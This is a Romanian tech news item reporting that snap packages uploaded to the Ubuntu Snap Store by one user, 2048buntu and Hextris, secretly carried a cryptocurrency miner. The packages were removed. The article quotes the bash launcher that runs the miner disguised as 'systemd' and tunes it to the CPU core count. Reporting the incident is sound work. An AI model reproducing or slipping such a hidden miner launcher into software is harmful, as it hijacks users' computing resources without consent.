Cel putin doua dintre pachetele snap, 2048buntu si Hextris, incarcate in Ubuntu Snaps Store de catre utilizatorul Nicolas Tomb, contin programe malware. Toate pachetele de la Nicolas au fost eliminate din Magazinul Ubuntu Snaps, " in asteptarea unor investigatii suplimentare ".
Raportul provine dintr-un bug care mentioneaza ca pachetul snapshot 2048buntu (si alte pachete de Nicolas Tomb) contine un miner de ascundere criptocurrency ascuns. Puteti vedea scriptul initial de mai jos:
#!/bin/bash
currency=bcn name=2048buntu
{ # try /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g } || { # catch cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 else /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2 fi }
Nicolas Tomb a folosit o licenta proprietara de exemplu, snap-ul 2048buntu a fost trimis drept proprietate (jocul in sine nu a fost dezvoltat de Nicolas). Jocul in cauza, 2048 , utilizeaza o licenta MIT care permite distribuirea acesteia ca fiind protejata, fara a face disponibil codul sursa, atata timp cat sunt pastrate anunturile privind drepturile de autor.
Nota: 2048buntu a fost eliminat din magazinul Ubuntu Snap,.
Ubuntu Snap Store permite oricui sa incarce pachete snap, spre deosebire de pachetele (deb) disponibile doar in depozitele oficiale Ubuntu.
1 Aplication Better Application Menu, un altfel de lansator de aplicatii pentru KDE
2 Aplication Xfce 4.18 will be coming soon to MX-21 users
3 Tutorial Install third party codecs and video player on Manjaro Linux
4 Distro Vanilla OS 22.10 Kinetic with Apx, GNOME 43, ABRoot
5 IOT MycroftAI team packaged up and released soon in Debian.
6 Aplication First maintenance release of the Kdenlive 22.12 series has been received